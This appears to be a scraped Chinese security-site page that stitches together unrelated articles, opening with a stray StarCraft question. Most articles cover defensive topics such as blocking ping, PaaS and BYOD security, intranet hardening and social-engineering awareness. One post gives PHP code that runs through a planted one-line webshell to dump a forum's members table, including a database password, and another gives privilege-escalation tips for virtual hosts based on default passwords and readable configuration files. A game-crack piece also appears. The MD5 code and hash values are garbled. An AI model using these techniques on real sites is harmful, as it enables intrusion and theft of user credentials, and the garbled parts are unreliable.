星际争霸2新手教程可以在MacBook上面下载吗?麻烦能讲一下基本规则以及一些新手要注意的技巧等,要详细点…

小站会根据您的关注,为您发现更多,
看到喜欢的小站就马上关注吧!
下一站,你会遇见谁的梦想?
欢迎大家来到金盾安全网&打造网络安全全民化!我们的网址:&
怎样禁止别人ping自己的电脑
来源 打造平民化 记住我们网址:我这人一直都不喜欢 装杀毒防火墙之类的软件,原因简单,不一定有多大用,小毒自己杀,大的他也杀不了,重要的是,占用我的资源.但是 总有些麻烦事,比如PING.烦人,对次,自己做了个禁止PING 不和大家一起
WIN2000/XP已经内置了防范工具---组策略的IP安全策略。(WINXP只有PRO版本有)创建了IP安全策略,对方就不能PING你的机子。下面我简单解说一下步骤: (1) 点击 开始--运行,在运行框中输入&Gpedit.msc&打开组策略。(2) 打开 计算机配置--WINDOWS设置--安全设置,右击&IP安全策略,在本地机器&,在弹出菜单中选&创建IP安全策略&打开&IP安全策略向导&。 (3) 设置IP安全策略名称,比如&禁止PING&,并输入简单的描述。安全通讯请求:勾选&激活默认响应错误&。默认响应规则身份验证方式: 选中&此字串用来保护密匙交换&,再在文字框中随意输入一些字符,比如&PCDigest&。创建IP安全规则最好要选中&编辑属性&,单击&完成&,打开属性对话框。(4) 在&禁止PING&属性窗口,单击&添加&按钮,在&安全规则向导&中进行以下简单的设置,其余一路回车就行。身份验证方法: 选中&此字串用来保护密匙交换&,再在文字框中输入原来设置的字符,比如&PCDigest&。 IP筛选器列表:单击&添加&/&添加&,设置源地址为&我的IP地址&,目标地址为&任何IP地址&,协议类型为&ICMP&协议。添加完毕之后,你就可以在IP筛选器中看到新创建的筛选器,选中它单击&下一步&继续。 筛选器操作: 选择&要求安全设置&,单击&下一步&,再点击&完成&--&关闭&即可保存设置,返回到组策略窗口。(5)在组策略窗口,点击&IP安全策略,在本地机器&,在右面的窗口中会显示你新创建的禁止PING的安全策略,右击该策略,在弹出的对话框中选&指派&命令,退出组策略。这时别人就不能再PING你的机器了
五步实现云计算PaaS安全性
来源 打造平民化 记住我们网址:当谈及安全性和云计算模型时,平台即服务(PaaS)有着它自己特殊的挑战。与其他的云计算模型不同,PaaS安全性所要求的应用程序安全性专业知识往往是大多数公司无法投入巨资就能够拥有的。这个问题很复杂,因为众多公司都使用&进驻式&基础设施级安全控制战略作为应用程序级安全性风险的应对措施(例如,一旦应用程序代码发布生产,使用WAF以缓解所发现的跨网站脚本程序或其他前端问题)。由于缺乏对PaaS中底层基础设施的控制,这一战略在PaaS部署应用中变得不具实际操作性。考虑到PaaS与控制相关的灵活性,你必须对底层计算环境具有一定的控制能力。如同IaaS一样,PaaS提供了近乎无限的设计灵活性:你可以基于社交网站构建任何应用,以实现内联网网站或CRM应用程序。但是,与IaaS不同的是,应用程序下的&堆栈&是不透明的,这就意味着支持应用程序的组件和基础设施都是(根据设计)一个&黑盒&。也就是说,与SaaS类似,安全性控制必须内置于应用程序本身中;但与SaaS中服务供应商通常实施应用于所有客户的应用程序级安全控制不同的是,在IaaS中安全控制措施是针对你的应用程序的。这就意味着必须由你自己承担责任以确定那些控制措施是合适的并执行具体的实施。这里的一个简单图示,表明了模型与客户之间的差异:
应用程序设计灵活性功能控制比底层透明度 对于那些在应用程序安全方面已投入巨资的组织来说,他们拥有固定满编训练有素的开发人员,独立的开发、测试以及生产流程,所以应对PaaS安全性问题应该是驾轻就熟的。而那些还未作出这些投资的机构可以遵循如下步骤,从而在一定程度上有助于应对PaaS安全性的挑战。
步骤一:建立安全措施应用程序安全性的根本挑战远在PaaS实施前就已经存在。因此,对于如何完善生产安全、鲁棒的应用程序的部署措施已有相当的研究。有一个可提供直接支持的技术被称为应用程序威胁建模。一些很好的着力点是OWASP威胁建模页以及微软公司的安全性开发生命周期资源页。从工具的角度来看,是免费跨网站脚本(XSS)和SQL注入。拥有内部工具的企业可以将其应用于PaaS的安全性措施,或者众多PaaS供应商为客户以免费或打折的价格提供了具有类似功能的工具。而当企业希望使用一个更为广泛的扫描策略时,他们还可以使用诸如Google公司的skipfish这样的免费工具。
步骤二:扫描网络应用程序众多公司已经接受了应用程序扫描,这是一个用于解决通用安全问题(例如跨平台脚本(XSS)和SQL导入)的网络应用程序扫描工具。拥有内部工具的企业可以将其应用于PaaS安全性措施,或者众多PaaS供应商为客户以免费或打折的价格提供了类似功能的工具。而当企业希望使用一个更为广泛的扫描策略时,他们还可以使用诸如Google公司的skipfish这样的免费工具。
步骤三:培训开发人员 应用程序开发人员完全通盘精通应用程序安全性原则是非常关键的。这可以包括语言级培训(即他们目前用于构建应用程序所使用语言中的安全编码原则)以及更广泛的议题,如安全性设计原则等。由于开发人员的减员和流动性等原因,这往往要求培训必须定期重复并作为常态保持下去,所以开发人员应用程序的安全性培训成本可能是较为昂贵的。幸运的是,还有一些免费的资源,例如Texas A&M/FEMA国内防备校园计划提供了一些安全性软件开发的免费电子学习资料。微软公司也通过其Clinic 2806提供了免费培训:微软开发人员安全性知道培训,这是一个开始你自己定制程序有用的入门级培训材料。
步骤四:拥有专用的测试数据这样的情况总是在不断发生中的:开发人员使用生产数据进行测试。这是一个需要正确认识的问题,因为机密数据(例如客户私人可辨识的数据)可能在测试过程中泄漏,特别是在开发或试运行环境中并没有执行与生产环境相同的安全措施时。PaaS的环境敏感性更甚,而众多PaaS服务更易于实现部署、试运行以及生产之间的数据库共享以简化部署。如开源Databene Benerator之类的工具可以产生符合你数据库特定结构的高容量数据,而数据格式调整有助于拥有专用的生产数据。通常,这些处理是属于特定框架的,因此你需要留意找出一个能够在你的特定环境中正常工作的。
步骤五:重新调整优先级这最后一个步骤是你可以实施的最重要的一个步骤。既然PaaS可能意味着一种文化和优先级的调整,那么相应地接受这一调整并将其真正纳入自己的思想行为体系中。使用PaaS,所有都是与应用程序相关;这意味着组织的安全性将高度依赖于组织中的开发团队。如果这不是PaaS的问题,那么这将会是一场噩梦了,因为在基础设施级你无法实施多少措施以缓解已识别的风险。如果你一直以来都是依赖于基础设施级的控制以满足在应用程序级的安全挑战,现在是时候重新考虑。
严格控制数据访问以提高BYOD的安全
来源 打造平民化 记住我们网址:尽管桌面虚拟化的BYOD安全效益,但它仍不是防止数据泄露的最好方法。要真正有一个安全的运行环境,你需要有严格控制数据访问控制的方法。   实现桌面虚拟化架构(VDI)可以解决一些BYOD安全问题,因为应用程序虽然是在客户机上运行,但实际上是部署在公用服务器上的,客户机上使用的是经过虚拟化部署的虚拟应用。这有助于防止侵入性的攻击,例如那些寄生在公共服务器程序中的病毒,当病毒离开公共服务器的,攻击就失效了。   面向BYOD安全的虚拟化桌面架构   对经常过时的IT设备和诸多的单位计算机的限制等不满的最终用户现在已经开始携带他们自己熟悉的设备去工作:例如iPad, iPhone,移动设备,MacBook,安卓设备等等。但是,当他们从这些设备访问公共的服务器(如Microsoft Excel电子表格,Adobe PDF文件等),网络就很难控制。即使用户只需简单从一个安全的公共环境发送一封电子邮件到其他人的个人设备,就可能导致BYOD的安全问题。   为了减轻这些风险,一些机构转向虚拟化部署,通常只是会话虚拟化,用户在公用服务器上运行程序。许多公司试用虚拟化桌面架构或基于计算机的传统服务器(如微软远程桌面服务和Citrix XenApp)。   为什么VDI无法完全杜绝安全问题   BYOD的安全问题不只是外部的威胁,数据溢出是另一个主要的安全问题,千里之堤毁于蚁穴,假如服务器被外部的计算机人员掌握,就很可能处于危险之中。   对于使用VDI的BYOD来说,不能只做好BYOD本身的安全问题。一旦部署了虚拟程序的和VDI桌面的服务器被病毒感染,那么BYOD的安全问题就很严重了,因为病毒会随着网络传播到客户机上,这时候本机就像完全不设防一样。   更多BYOD的安全问题:   VDI虚拟桌面可以让BYOD更加安全,但管理员经常忽略了将数据修改的权限集中于服务器的重要性。一旦用户可以连接到服务器,通过本地客户机打开或者修改文件。比如,如果你在客户机的Outlook建立一个规则,把你所有能接收的email都指向一个外部账户,你就可以把服务器上的数据都发送到安全网络之外。   这种数据泄露的后果有时候比病毒严重得多,所以你必须严格控制服务器数据的访问权限。   控制数据访问的方法   服务器上的数据很容易产生反弹式的泄露,病毒或者恶意程序会把数据从服务器内部发送到服务器外部,更甚者会产生0day漏洞的攻击。为了预防这些漏洞的产生,管理员必须严格控制好端口转发,白名单,可信任列表等。   要进一步控制数据的访问,管理员就得把控制好应用程序的执行。如限制程序的执行范围和执行时间,哪些客户端可以使用哪些应用程序,限制客户端通过内部网络可访问的外部网络等。   BYOD的安全问题需要管理员有主动防御的意识,而不是等到发生了问题再去不断地修复。所以管理员必须要对BYOD的安全有很好的了解,才能做到防范于未然
作者:Cl&udio Rodrigues 译者:吴炫国 来源:TechTarget中国
提升安全十招全面巩固企业的内网
来源 打造平民化 记住我们网址:几乎所有企业对于的重视程度一下子提高了,纷纷采购防火墙等设备希望堵住来自Internet的不安全因素。然而,Intranet内部的攻击和入侵却依然猖狂。事实证明,公司内部的不安全因素远比外部的危害更恐怖。  几乎所有企业对于的重视程度一下子提高了,纷纷采购防火墙等设备希望堵住来自Internet的不安全因素。然而,Intranet内部的攻击和入侵却依然猖狂。事实证明,公司内部的不安全因素远比外部的危害更恐怖。  大多企业重视提高企业网的边界安全,暂且不提它们在这方面的投资多少,但是大多数企业网络的核心内网还是非常脆弱的。企业也对内部网络实施了相应保护措施,如:安装动辄数万甚至数十万的网络防火墙、入侵检测软件等,并希望以此实现内网与Internet的安全隔离,然而,情况并非如此!企业中经常会有人私自以Modem拨号方式、手机或无线网卡等方式上网,而这些机器通常又置于企业内网中,这种情况的存在给企业网络带来了巨大的潜在威胁,从某种意义来讲,企业耗费巨资配备的防火墙已失去意义。  这种接入方式的存在,极有可能使得绕过防火墙而在企业毫不知情的情况下侵入内部网络,从而造成敏感数据泄密、传播病毒等严重后果。实践证明,很多成功防范企业网边界安全的技术对保护企业内网却没有效用。于是网络维护者开始大规模致力于增强内网的防卫能力。  下面给出了应对企业内网安全挑战的10种策略。这10种策略即是内网的防御策略,同时也是一个提高大型企业网络安全的策略。  1、注意内网安全与网络边界安全的不同  内网安全的威胁不同于网络边界的威胁。网络边界安全技术防范来自Internet上的攻击,主要是防范来自公共的网络服务器如HTTP或SMTP的攻击。网络边界防范(如边界防火墙系统等)减小了资深黑客仅仅只需接入互联网、写程序就可访问企业网的几率。内网安全威胁主要源于企业内部。恶性的攻击事件一般都会先控制局域网络内部的一台Server,然后以此为基地,对Internet上其他主机发起恶性攻击。因此,应在边界展开黑客防护措施,同时建立并加强内网防范策略。  2、限制VPN的访问  虚拟专用网(VPN)用户的访问对内网的安全造成了巨大的威胁。因为它们将弱化的桌面操作系统置于企业防火墙的防护之外。很明显VPN用户是可以访问企业内网的。因此要避免给每一位VPN用户访问内网的全部权限。这样可以利用登录控制权限列表来限制VPN用户的登录权限的级别,即只需赋予他们所需要的访问权限级别即可,如访问邮件服务器或其他可选择的网络资源的权限。  3、为合作企业网建立内网型的边界防护  合作企业网也是造成内网安全问题的一大原因。例如安全管理员虽然知道怎样利用实际技术来完固防火墙,保护MS-SQL,但是Slammer蠕虫仍能侵入内网,这就是因为企业给了他们的合作伙伴进入内部资源的访问权限。由此,既然不能控制合作者的网络安全策略和活动,那么就应该为每一个合作企业创建一个DMZ,并将他们所需要访问的资源放置在相应的DMZ中,不允许他们对内网其他资源的访问。  4、自动跟踪的安全策略  智能的自动执行实时跟踪的安全策略是有效地实现网络安全实践的关键。它带来了商业活动中一大改革,极大的超过了手动安全策略的功效。商业活动的现状需要企业利用一种自动检测方法来探测商业活动中的各种变更,因此,安全策略也必须与相适应。例如实时跟踪企业员工的雇佣和解雇、实时跟踪网络利用情况并记录与该计算机对话的文件服务器。总之,要做到确保每天的所有的活动都遵循安全策略。  5、关掉无用的网络服务器  大型企业网可能同时支持四到五个服务器传送e-mail,有的企业网还会出现几十个其他服务器监视SMTP端口的情况。这些主机中很可能有潜在的邮件服务器的攻击点。因此要逐个中断网络服务器来进行审查。若一个程序(或程序中的逻辑单元)作为一个window文件服务器在运行但是又不具有文件服务器作用的,关掉该文件的共享协议。  6、首先保护重要资源  若一个内网上连了千万台(例如30000台)机子,那么要期望保持每一台主机都处于锁定状态和补丁状态是非常不现实的。大型企业网的安全考虑一般都有择优问题。这样,首先要对服务器做效益分析评估,然后对内网的每一台网络服务器进行检查、分类、修补和强化工作。必定找出重要的网络服务器(例如实时跟踪客户的服务器)并对他们进行限制管理。这样就能迅速准确地确定企业最重要的资产,并做好在内网的定位和权限限制工作。  7、建立可靠的无线访问  审查网络,为实现无线访问建立基础。排除无意义的无线访问点,确保无线网络访问的强制性和可利用性,并提供安全的无线访问接口。将访问点置于边界防火墙之外,并允许用户通过VPN技术进行访问。  8、建立安全过客访问  对于过客不必给予其公开访问内网的权限。许多安全技术人员执行的&内部无Internet访问&的策略,使得员工给客户一些非法的访问权限,导致了内网实时跟踪的困难。因此,须在边界防火墙之外建立过客访问网络块。  9、创建虚拟边界防护  主机是被攻击的主要对象。与其努力使所有主机不遭攻击(这是不可能的),还不如在如何使攻击者无法通过受攻击的主机来攻击内网方面努力。于是必须解决企业网络的使用和在企业经营范围建立虚拟边界防护这个问题。这样,如果一个市场用户的客户机被侵入了,攻击者也不会由此而进入到公司的R&D。因此要实现公司R&D与市场之间的访问权限控制。大家都知道怎样建立互联网与内网之间的边界防火墙防护,现在也应该意识到建立网上不同商业用户群之间的边界防护。  10、可靠的安全决策  网络用户也存在着安全隐患。有的用户或许对网络安全知识非常欠缺,例如不知道RADIUS和TACACS之间的不同,或不知道代理网关和分组过滤防火墙之间的不同等等,但是他们作为公司的合作者,也是网络的使用者。因此企业网就要让这些用户也容易使用,这样才能引导他们自动的响应策略。  另外,在技术上,采用安全交换机、重要数据的备份、使用代理网关、确保操作系统的安全、使用主机防护系统和入侵检测系统等等措施也不可缺少。
防范社会工程学攻击之道
来源 打造平民化 记住我们网址:
保护个人信息
  曾和一位攻防技术高超的聊天,他认为SQL入住和跨站两大攻击方法虽然是目前国内最为流行的黑客攻击手段,但从国际黑客攻防技术发展趋势看,未来&社会工程学&无疑将成为最持久的也是有效的攻击手段。
  无论处于什么目的,若要使用社会工程学必先要了解目标对象的相关信息,作为网络管理者,保护好单位领导以及员工的信息是你不可推卸的责任。当然在保护他人信息不被窃取之时,也要注意这些人在无意识的状态下,主动泄露自己的信息。社交网站无疑是无意识泄露信息最好的地方,它也成为黑客们最喜欢光顾的地方。
  本文就是提醒用户如何方法在社交网络网站上不要透露过多的个人信息,希望能对你的IT运维工作有所帮助。
  由于身份失窃案不断增多、个人信息越来越宝贵,没有什么事比提防在网上透露个人信息更重要的了。
  像Facebook这些社交网络网站已经基本上取代了网上聊天室和论坛&&至少在成年人圈子里是这样,成了在网上转悠、消磨时间的好玩去处。遗憾的是,它们同样取代聊天室,成了通俗小报中恋童癖者选择下手目标的去处。
  但尽管我们有意识地监控孩子们的网络使用,并对他们可以访问哪些网站以及允许上网多长时间进行了限制,我们还是有可能面临其他各种威胁。
  身体力行
  你在教育孩子只能与熟悉的人聊天、并且对他们透露多少个人信息进行限制时,还要考虑自己是否身体力行、说到做到。
  你要是通过在Facebook的个人档案向外人宣布在某某峡谷体验了一把蹦极跳,这表明你在人家眼里仍是个笑料。如果你的个人档案上面除了当前和昔日雇主的推介评语,还写明了出生日期、家乡、住址和电话号码,实际上向盗用你身份的不法分子敞开了大门,根本就没有设防。
  在过去,录音表明你外出度假的应答电话留言无异于泄露了秘密,这对伺机作案的窃贼来说是再好不过的消息了。如今,粗心大意的个人状况最新信息或者没有得到保护的网上个人档案也带来了这样的隐患,使网络骗子得以把你的个人资料偷来卖掉。
  限制透露
  许多社交网络网站上的隐私选项并不总是在默认情况下启用的,不过Facebook已采取了一些措施,大大提高了用户当前安全设置的透明度。即便如此,你还是应当检查一下谁可以查看哪些信息。Facebook主页右上方的&隐私&(Privacy)选项让你可以限定谁可以浏览你的详细资料、谁可以对你进行搜索。
  今年2月,Facebook达成了一项交易,可以通过搜索引擎来搜索发布信息和个人档案。骗子们甚至不必成为Facebook的成员,就可以查明你的下落、找出你的个人信息。
  尽管有许多人强烈抗议,但这依然是事实:Facebook的注册条款允许它可以这么做&&尽管你的个人档案可能就是你的一切、充当你的网上身份,但这全部归Facebook所有。这里的关键在于,确保你在注册之前认真阅读了相关条款和条件。
  允许朋友浏览自己的电子邮件地址、照片、状态和音乐爱好完全可以,不过我们建议你还是禁用搜索部分。另外,如果你允许朋友的朋友和&我网络中的任何人&浏览你在网上的一举一动,你其实已经暴露在成千上万的观众面前&&如果你的其中一个网络是伦敦交友网,更是如此。你网络中的任何人都有可能利用从你的个人档案获取的信息对你造成不利。
  要提防那些貌似&共同的&朋友企图把你添加到好友列表。他们可能只是想与别人比一比谁的网上朋友更多;或者他们希望成为你的朋友可能只是企图通过你的个人档案获取更详细的个人资料。
  虽然这听上去不太可能会发生,但还是有许多媒体报道了这种案例:有人就通过这种方式来利用公开及半公开发布的个人信息。
 知己知彼
  同样,就因为某人似乎认识你的其中一个朋友,就想当然地以为对方值得信赖,这恐怕是个错误。去年,三名少女在Bebo留言板上结识了一名中年男子,结果却被该男子&特别关照&,后来又在现实生活中被对方尾随追踪。每个女孩都很信任他,因为他显然是另外两个女孩的网上朋友。
  正如该男子被捕后其中一个女孩叙述的那样,他继续对自己的其中一个校友很友好,这让她忽视了对方的古怪行为&&包括他经常有板有眼地讲述她们几个人上超市购物以及在网上讨论过的其他活动。
  后来这名网上尾随追踪者出现在泰特现代美术馆时终于被逮住了。他事先得知,这些女孩要去该美术馆、参加学校组织的旅游;就在他偷拍网上结识的其中一个女孩时,被认了出来。她们在他还没有溜掉就报告了保安和警方。
  虽然这是一起特别严重、特别具有戏剧性的案例,但反映了另一个问题。你的朋友相信别人是出于对方的声誉和信任,这是我们当面和网上人际交流关系的一个重要因素。而LinkedIn和Plaxo等商业网络也恰恰利用了这一点。
  在LinkedIn,声誉排名和反馈的重要性如今已取代了此类网站的原来目标:建立一个商业伙伴圈子,并在他们不断更换雇主的过程中与对方保持联系。所以要确保你随时关注谁透露了自己的个人信息。
  如果要说服某人人在网上向你购买商品,你的声誉就显得至关重要。《InfoWorld》杂志的&个人电脑顾问&(PC Advisor)论坛显示,如今在网上购物之前,打听一下其他客户对某家公司有什么评价,这已成了一种惯例&&如果这家公司是小型零售商,就显得更重要。
  浪漫插曲
  还是让我们回到原来的那个警告:不要随意透露自己的个人信息,还要为不仅仅是普通朋友的网上异性着想。这是成年人所要关注的地方:说到保护隐私,网上异性与孩子们一样重要。
  网上交友名声不佳,因为谁都可以借此掩饰自己的真实年龄、职业、身高、性别和目的&&这就是为什么它如此流行。如果你想利用网络来结识朋友,那么首先要确保安全、放心。通过一家监管严格、信誉良好又正规的交友介绍所,调查一下享受过服务的别人对它有什么样的评语,就能弄清楚这家介绍所在介绍双方相识之前采取了什么样的核查措施。
  预计介绍所会向你提一些深入的个人问题,证实你是不是就是你所说的那个人。传统的交友介绍所经常要求你出示护照、驾驶证、地址证明、出生证和离婚证等证件。
  声誉良好的网上介绍所应该会坚持提供类似的保证。如果它们没有全面核查你的身份,谁又知道它们在核查你下一会约会对象的身份呢?
  凭冲动行事以及对潜在约会对象提供的信息信以为真十分愚蠢:不管从什么意义上说这都是很危险的。
&人&是在整个网络安全体系中最薄弱的一个环节,按照木桶理论,网络安全的水平有最低的木块决定的。我国从事专业安全的技术人员不多,很多小型企业的网管等都是半途出家,对安全方面的知识本身懂的不多,加之安全教育以及安全防范措施都需要成本,对于国内企业来讲,注重技术技能的培训,而轻于网络安全方面的培训,只有在接受严重的损失以后,才会意识网络安全的重要性。的重要意义就在于积极防御,将风险降到最低,网络安全重在意识,只有安全的意识,才能铸就安全的铜墙铁壁。在安全培训上面可以从以下两个方面着手:
  网络安全意识的培训
在进行安全培训时要注重社会工程学攻击以及反社会工程学攻击防范的培训,无论是老员工还是新员工都要进行网络安全意识的培训,培养员工的保密意识,增强其责任感。在进行培训时,结合一些身边的案例进行培训,例如QQ账号的盗取等,让普通员工意识到一些简单社会学攻击不但会给自己造成损失,而且还会影响到公司利益。
 技术的培训
虽然目前的网络入侵者很多,但对于有着安全防范意识的个人或者公司网络来说,入侵成功的几率很小。因此对员工要进行一些简单有效的技术培训,降低网络安全风险。网络安全技术培训主要从系统漏洞补丁、应用程序漏洞补丁、杀毒软件、防火墙、运行可执行应用程序等方面入手,让员工主动进行网络安全的防御。
  只有提高了整体的防范意识和水平,在教育培训方面并不需要投入太多的精力就可以在降低网络安全风险方面取得很大的成效。
 安全审核工作是社会工程学攻击防范主要手段之一,对在安全教育培训后的有力保障措施。安全审核重在执行,发现一起问题处理一起问题。安全审核一般有以下几个方面。
  身份审核
  身份审核是指在需要进出的关口核查身份,判断是否应该放行。身份审核一定要认真仔细,层层把关,只有在真正的核实身份之后并进行相关登记后才能给予放行。在某些重要安全部门,还应根据实际情况需要,采取指纹识别、视网膜识别等方式进行身份核定,以确保网络的安全运行。
  操作流程审核
  操作流程审核要求在操作流程的各个环节进行认真的审查,杜绝违反操作规程的行为。一般情况下,遵守操作流程规范,进行安全操作,能够确保信息安全;但是如果个别人员违规操作就有可能泄漏敏感信息,危害。
  安全列表审核
  针对公司的实际情况,做一个安全列表检查单(checklist),定期对公司个人电脑进行安全检查,这些安全检查主要包括计算机的物理安全检查和计算机操作检查。计算机物理安全是指计算机所处的周围环境或计算机设备能够确保计算机信息不被窃取或泄漏。计算机操作系统安全是指从操作系统层面着手,维护计算机信息安全,计算机操作系统安全的内容比较多,主要从杀毒软件定期升级、操作系统漏洞补丁及时升级、安装防火墙、U盘杀毒、不运行不明程序和禁止打开来历不明的附件等方面进行考虑。
  建立完善的安全响应应对措施
  应当建立完善的安全响应措施,当员工受到了社会工程学的攻击或其它攻击,或者怀疑受到了社会工程学和反社会工程学的攻击,应当及时报告,相关人员按照安全响应应对措施进行相应的处理,降低安全风险。
表面上,社会工程学看似只是简单的欺骗,但是在中,它的攻击效果往往是最显著的。究其原因是它包含了极其复杂的心理学因素,所以危害性比其它入侵更加难以防范。只要我们时刻提醒自己攻击随时有可能在身边发生,全面了解社会工程学的攻击方法或手段,具备一定的安全防范知识和防范措施,在面对社会工程学攻击的时候就能识别其真面目,处于主动地位,将攻击的风险性降至最低。
一句话专家模式”脱裤”
来源 打造平民化 记住我们网址:条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如拖库。&这儿利用的是马儿的专家模式(自己写代码)。&&&ini_set(&display_errors&, 1);&set_time_limit(0);&error_reporting(E_ALL);&$connx = mysql_connect(&:/var/tmp/mysql.sock&, &forum&, &xx!!xx3&P) or die(&Could not connect: & . mysql_error());&mysql_select_db(&discuz&,$connx) or die(&Could not connect: & . mysql_error());&$result = mysql_query(&SELECT * FROM members&,$connx) or die(&Could not connect: & . mysql_error());&$i = 0;&$tmp = &;&while ($row = mysql_fetch_array($result, MYSQL_NUM)) {&$i = $i+1;&$tmp .= implode(&::&, $row).&n&;&if(!($i%500)){//500条写入一个文件&$filename = &/home/httpd/bbs.xxxxx/forumdata/cache/user&.intval($i/500).&.txt&;&file_put_contents($filename,$tmp);&$tmp = &;&}&}&mysql_free_result($result);&&&//down完后delete&ini_set(&display_errors&, 1);&error_reporting(E_ALL);&$i = 0;&while($i&32) {&$i = $i+1;&$filename = &/home/httpd/bbs.xxxx/forumdata/cache/user&.$i.&.txt&;&unlink($filename);&}&&&AKPC_IDS += "1823,";&&&Popularity: 5% [?]
传单机暗黑3破解版已流出
来源 打造平民化 记住我们网址:暗黑破坏神3破解。这个题目有点邪恶了,不过我知道,你们是绝对不会不往下看的,哈哈。其实,自从暗黑3初现端倪之时。对于破解暗黑3的讨论就从来没听过,不论是玩家,网站,还是各大黑客组织,为这个话题争论而落下的的口水都可以汇成一条奔腾的大河了,大家的论点主要分成2派:&&暗黑破坏神3必然不会被破解&&&持有这种观点的人坚持认为,暴雪大神们的威力是无穷的,在线游戏就是破解不了的,甚至国外的一些专业黑客组织也是这么认为的。比如在黑客中颇为知名的某个破解组织就是这么说的:&&&&通过对近期对《暗黑3》的破解,我们发现:《暗黑破坏神3》应该是一个彻彻底底的网游,使用的网络框架跟《魔兽世界》几乎一样,甚至怀疑就是一种东西,跟《星际争霸2》有较大区别。如果不在服务端建立数据库,就可能没有npc,不能保存人物,同时触发事件报错等问题。&
魔兽世界&从上面这段话可以看出:期待《暗黑破坏神3》完美破解根本不可能,有山口山的前车之鉴,要想在本地做出跟暴雪一样的数据库,等于是从新做一个游戏,任何组织或个人都没这个能力。即使有这个能力,也没这个财力和时间。
星际争霸2暗黑破坏神3必然被破解&事实上,刚才说到的《星际争霸2》,虽然它的局域网对战版本没有被破解,但是单机版本满天飞。直接把很多想来体验的玩家乐的合不拢嘴。那么暗黑破坏神3破解是个什么情况呢?很明显,这些大牛们是实干派,不玩发言这套,而是直接上图了:确实,并不是所有游戏都可以被破解的,比如采用了在线验证游戏模式的《轩辕剑》系列和Ubi的很多游戏都没有被破解,而且暴雪自己的《星际争霸2》也一样。那么暗黑3呢?
暗黑3破解版截图这是传说中的暗黑破坏神3破解的试玩截图,看起来好像很有模有样
暗黑3破解版截图据说已经可以体验完整的第一关场景了,效果和拥有Beta帐号无异。
而且连详细的单机模拟器的界面都放出来了。看起来完成度很高呀。
也许,想完美破解暗黑破坏神3,确实是不可能的,但是不完美破解呢?比如,像《星际争霸2》这样的单机模板破解呢?跟别说更加满天飞的《WOW》单机版了。星际争霸2单机模式被破解后,造成大量浅度玩家流失。WOW由于出色的社交系统,对于破解和私服的困扰相对较小,那么暗黑3呢?作为游戏模式介于单机和网游之间的暗黑破坏神3,遇到这种非完美破解又会如何呢?&
实际上可以肯定的说,像暴雪大神这种传说级Boss,对们就好像有斗牛光环一样,都是红了眼往上冲,有所闪失是必然的,被破解其实并不可怕,可怕的是大神要如何对待我们这些玩游戏的人,星际争霸2和魔兽世界的故事真是无比经典的对比,暗黑破坏神3破解怎么样,且让我们拭拭目以待&&
西部数码虚拟主机提权思路
来源 打造平民化 记住我们网址:说明 西部数码虚拟主机安装后默认s-u的LocalAdministrator用户密码为root3306就算修改了也是可以读取ini文件得到加密密码的mysql 的root密码在安装过程中会提示是否修改 默认也是为root3306 或者 123456&在这些服务安装的过程中西部数码给这些服务都是低权限运行的。所以无法使用一些webshell集成的s-u EXP来提权这里我写了一个脚本专门针对这种虚拟主机提权用的! ^_^`&值得一说的是在该虚拟主机并未删除Wscript.Shell组建。不过很杯具的是我没有找到执行目录.所以我才整出了这个东西出来嘿嘿。该虚拟主机默认软件安装路径:d:\SOFT_PHP_PACKAGE\ 在该目录下setup.ini配置文件中记录着mysql root 密码 site.xml 记录着网站配置信息(3.0以前的版本)3.0版本现在集成到了access数据库中 也是存放在 默认安装路径下的iistool.dat 文件中 用户权限也是 users组可读 这样我们就可以利用webshell获取到各种信息了哈哈(这个其实是一个access数据库文件 他的连接密码为:www@west263@cn )
浅谈网站安全之MD5加密
来源 打造平民化 记住我们网址:MD5加密算法在我们做网站开发的时候用过的很多,首先用户的密码我们每次都是要加密存进数据库。其实在C#中实现对数据(字符串)的MD5加密是非常简单的。&引用using System.Security.C&public string Md5(string str)&{&MD5 md5 = new MD5CryptoServiceProvider();&byte[] data = puteHash(UnicodeEncoding.Default.GetBytes(str));&StringBuilder strBuilder = new StringBuilder();&for (int i = 0; i & data.L i++)&{&strBuilder.Append(data[i].ToString("x2"));&}&return strBuilder.ToString();&}&这样返回的是32位的字符串。&但是我们在查看别人的数据库数据的时候有是会发现PASSWORD是16位的。&这是这样计算的:&md5计算(admin)= 7a57 a5a7 e 4a80 1fc3;&16=7a57 a5a7 e;其实是在32位的加密的基础上取了它的重第9位到24位。即substring(8,16)。&其实还有一个就是我在查看别人数据库的时候发现有40位的(主要是各大破解MD5的网站太多了,MD5加密已经没有那么安全了,所以有些人又变换出来了40位的。其实一看40位的也很简单,变换的不复杂。):&我们一起开看看它是怎么运算的:&40位的:7a57 a5a7 e 4a80 1fc3 e 4a80 1fc3&前面16位:即是MD516位的加密7a57 a5a7 e。&剩下的24位:4a80 1fc3 e 4a80 1fc3&不难发现:4a80 1fc3=MD532位加密的后8位+ e=MD516位加密的后8位+4a80 1fc3=MD532位加密的后8位。&所以这核心就是保存了前面16位。有了这16位就可以保证数据的正确性,至于后面的都是迷惑大家用的。其实也可以进行其他各种的变换。如我对它(admin)进行16加密只后把它首位分开放置.然后中间在按照自己的算法放置字符串。产生一个40位的密码。&为什么会这样说呢?&其实现在的SQL注入还是很严重的。万一我们的网站做的出现了注入漏洞的话,被某些HACKER(脚本小孩),拿到了帐号密码之后,一看是40位的。它就开始蒙了。心想这是什么加密,(其实加密的算法有很多哦。)百度之后呵呵抱歉这是你自己想的一个。这样就可以避免了一些威胁。不是吗?&还有就是自己的密码长度格式:在13位左右-有数字,字母,大小写,以及@字符&例如:AiaoqQ@91b91b&这是我的一个密码的规范:在@之前的密码用字母表示第一个和最后一个都大写&@之后都用数字但是出现了8我就替换成b.&也很好记住:xiaoqq我的昵称,918我的生日重复一次。遇到8=b.&呵呵希望这篇文章对某些人有帮助。
内网渗透—如何打开突破口
